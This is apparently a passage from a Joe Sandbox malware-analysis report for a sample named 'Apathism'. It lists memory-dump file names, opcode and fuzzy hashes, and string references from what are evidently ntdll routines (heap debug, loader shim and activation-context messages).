                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 94763bfa490a17110b1ab6f8bb6cb3089e7659b51564aae3c12c6baa8f9f2bdf
                          • Instruction ID: f7917994f0b9075ff3d3c5c6390c9cec34bf8a174f7acdab01783ff5844a9539
                          • Opcode Fuzzy Hash: 94763bfa490a17110b1ab6f8bb6cb3089e7659b51564aae3c12c6baa8f9f2bdf
                          • Instruction Fuzzy Hash: 689002A5201644924500B25C8484B0A450647E0301B95C016E1054924CC5398D519136
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bad42f504071704f2bad4fbe7b4d132804d808010652c4694cabbcb327e5690
                          • Instruction ID: 95262dd0bd2da272d877f7c7e71d1f52eaa93a48d0309e416aa61446151453d0
                          • Opcode Fuzzy Hash: 6bad42f504071704f2bad4fbe7b4d132804d808010652c4694cabbcb327e5690
                          • Instruction Fuzzy Hash: 63900229221504020145B55C068460B044657D63513D5C015F1416954CC6358D655322
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0233b9d064ea741c00200cf68510f0c2b916e1043bf110a0889ea5f0fab98ac7
                          • Instruction ID: 5ffd67d2bbf8831fb34278814c585546189a3babf041f157f2a20f5d7ca73f3b
                          • Opcode Fuzzy Hash: 0233b9d064ea741c00200cf68510f0c2b916e1043bf110a0889ea5f0fab98ac7
                          • Instruction Fuzzy Hash: 7190043D311504030105F55C07C4707004747D53513D5C031F1015D14CD735CD715133
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d08dd666bf3628f62099d7addaa92977b665f74096face6beba0eecce8529cbb
                          • Instruction ID: 5f621ab5da1e23fc361767fdaaa63b2a1a96bd92c7aefad1a317ee05c4c38de9
                          • Opcode Fuzzy Hash: d08dd666bf3628f62099d7addaa92977b665f74096face6beba0eecce8529cbb
                          • Instruction Fuzzy Hash: 61900265202504034105715C4494716400B47E0301B95C021E1014954DC5398D916126
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb27fd7a595aa06d7ee083bf1a856a048511374e36398876a0259cfd489c0bf8
                          • Instruction ID: e5b96411b57261cc418b15dcc0acb4f88f8ef42bd8747289cbc6d6c01e716cd9
                          • Opcode Fuzzy Hash: eb27fd7a595aa06d7ee083bf1a856a048511374e36398876a0259cfd489c0bf8
                          • Instruction Fuzzy Hash: 7690023560550C02D150715C4494746000647D0301F95C011A0024A18D87698F5576A2
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 41e87ec5a5a706a428bebcd554760e7ea5e498d3f4d51e5a5eea3f3877db1679
                          • Instruction ID: 16a14867d78f151819bc22d4f5ff362f211f9afd1e484fdb5b0dd7231dc66bc0
                          • Opcode Fuzzy Hash: 41e87ec5a5a706a428bebcd554760e7ea5e498d3f4d51e5a5eea3f3877db1679
                          • Instruction Fuzzy Hash: 0690023520150C02D104715C4884786000647D0301F95C011A6024A19E96798D917132
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b092cf3ea7eb9bfdbb3c7d3e76906058e4778ca92441bdd0db83c59cba7eb3b
                          • Instruction ID: d54dea871d19ff88040ed5f1bce2c6b8485767c89ae94b0afec3a05a1fe571ef
                          • Opcode Fuzzy Hash: 2b092cf3ea7eb9bfdbb3c7d3e76906058e4778ca92441bdd0db83c59cba7eb3b
                          • Instruction Fuzzy Hash: 8D90023520150C02D180715C448474A000647D1301FD5C015A0025A18DCA298F5977A2
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 68a0a4008cfc87847ccb75ed43d1687b9c563c5d5170d686bf5cc3a56396985f
                          • Instruction ID: b86e5c0a5f6a2f14d6a891c9fdf12b037f12c208a6a59ccdce46baf8d05273ed
                          • Opcode Fuzzy Hash: 68a0a4008cfc87847ccb75ed43d1687b9c563c5d5170d686bf5cc3a56396985f
                          • Instruction Fuzzy Hash: 6790023520554C42D140715C4484B46001647D0305F95C011A0064A58D96398E55B662
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 12ddb0a23ce52338d9188a02766985ceab20a9e49ff3cd74eee1da01244d748a
                          • Instruction ID: efd3ebe153e99a3007870189b67effbbc93b133bf76885e393755b26b28958a3
                          • Opcode Fuzzy Hash: 12ddb0a23ce52338d9188a02766985ceab20a9e49ff3cd74eee1da01244d748a
                          • Instruction Fuzzy Hash: 6190022530150802D102715C4494706000A87D1345FD5C012E1424919D86398E53A133
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f11dc0a4b01f74418772ef19afa4fd232919d86cac27e44cde11d78fb8c8e633
                          • Instruction ID: ec4a0153ccb5f76e4da92d2f8af8fdf2cd0a13a75365d27decbcfbd9f535f65e
                          • Opcode Fuzzy Hash: f11dc0a4b01f74418772ef19afa4fd232919d86cac27e44cde11d78fb8c8e633
                          • Instruction Fuzzy Hash: 6690027520150802D140715C4484746000647D0301F95C011A5064918E866D8ED56666
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 80970c1a390db6bd7bfb63f3cfa68cfcd6d7b11a1f5299783712fc90370faf3a
                          • Instruction ID: d8849f4229fd2f4560c3d33a3d4833a1e098a3b093466c41e855da38539e2976
                          • Opcode Fuzzy Hash: 80970c1a390db6bd7bfb63f3cfa68cfcd6d7b11a1f5299783712fc90370faf3a
                          • Instruction Fuzzy Hash: 9690022560150902D101715C4484716000B47D0341FD5C022A1024919ECA398E92A132
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8673e7646c94041c02016cfa0db66c815c4fe655bfdd1cc327d66c352f0f3633
                          • Instruction ID: 4a6b7bd7906c5c30086e5d27bc0f2384ab73067f52d081f316b8ca0a473cae32
                          • Opcode Fuzzy Hash: 8673e7646c94041c02016cfa0db66c815c4fe655bfdd1cc327d66c352f0f3633
                          • Instruction Fuzzy Hash: 7390026520190803D140755C4884707000647D0302F95C011A2064919E8A3D8D516136
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67877ca5c591f92dc85de41f0085f3022c18a393d4e5411e5fdeeaa8b722d208
                          • Instruction ID: 0e3662cbd4cd482801567be7476b9853529fef7cd511c547e23bbe9f3191f23d
                          • Opcode Fuzzy Hash: 67877ca5c591f92dc85de41f0085f3022c18a393d4e5411e5fdeeaa8b722d208
                          • Instruction Fuzzy Hash: 5790026534150842D100715C4494B06000687E1301F95C015E1064918D862DCD526127
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1596672ff164b8c262f5a9e2f293d7ea4513efe0717625f5680a10d3d01e2af
                          • Instruction ID: 5ed7996990faecc7feac5a7734b81209c096a6fbcc6bc1d27c31450ab6fa78d3
                          • Opcode Fuzzy Hash: b1596672ff164b8c262f5a9e2f293d7ea4513efe0717625f5680a10d3d01e2af
                          • Instruction Fuzzy Hash: EA90026521150442D104715C4484706004647E1301F95C012A2154918CC53D8D615126
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a7b1c28bfd5a091a1c38dbd1d5833e5c9a84013771d9652906f697259a5c01c3
                          • Instruction ID: 1edf90ff00015fbd87d4d2e8ba85cdced911cb921bf9f2d35b653d6951220188
                          • Opcode Fuzzy Hash: a7b1c28bfd5a091a1c38dbd1d5833e5c9a84013771d9652906f697259a5c01c3
                          • Instruction Fuzzy Hash: 62900225601504424140716C88C4A0640066BE1311795C121A0998914D856D8D655666
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd

                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105

                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105

                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: HEAP:
                          • API String ID: 3446177414-2466845122

                          Strings
                          • ExecuteOptions, xrefs: 223A46A0
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 223A4725
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 223A46FC
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 223A4787
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 223A4742
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 223A4655
                          • Execute=1, xrefs: 223A4713
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          Strings
                          • RtlpFindActivationContextSection_CheckParameters, xrefs: 223979D0, 223979F5
                          • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 223979D5
                          • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 223979FA
                          • Actx , xrefs: 22397A0C, 22397A73
                          • SsHd, xrefs: 2234A3E4
                          • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 22397AE6
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                          • API String ID: 0-1988757188
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                          • API String ID: 3446177414-1745908468
                          APIs
                          Strings
                          • minkernel\ntdll\ldrinit.c, xrefs: 22389AC5, 22389B06
                          • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 22389AF6
                          • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 22389AB4
                          • LdrpLoadShimEngine, xrefs: 22389ABB, 22389AFC
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-3589223738
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: @3B"$LdrpUnloadNode$Unmapping DLL "%wZ"$dfB"@3B"@3B"$minkernel\ntdll\ldrsnap.c
                          • API String ID: 3446177414-1438501669
                          APIs
                          • RtlDebugPrintTimes.NTDLL ref: 2235D959
                            • Part of subcall function 22334859: RtlDebugPrintTimes.NTDLL ref: 223348F7
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                          • API String ID: 3446177414-1975516107
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                          • API String ID: 3446177414-3224558752
                          APIs
                          Strings
                          • Entry Heap Size , xrefs: 223DF26D
                          • ---------------------------------------, xrefs: 223DF279
                          • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 223DF263
                          • HEAP: , xrefs: 223DF15D
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                          • API String ID: 3446177414-1102453626
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                          • API String ID: 3446177414-1222099010
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: $$@
                          • API String ID: 3446177414-1194432280
                          APIs
                          Strings
                          • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 223A362F
                          • LdrpFindDllActivationContext, xrefs: 223A3636, 223A3662
                          • Querying the active activation context failed with status 0x%08lx, xrefs: 223A365C
                          • minkernel\ntdll\ldrsnap.c, xrefs: 223A3640, 223A366C
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                          • API String ID: 3446177414-3779518884
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          Strings
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 223A02BD
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 223A02E7
                          • RTL: Re-Waiting, xrefs: 223A031E
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmp
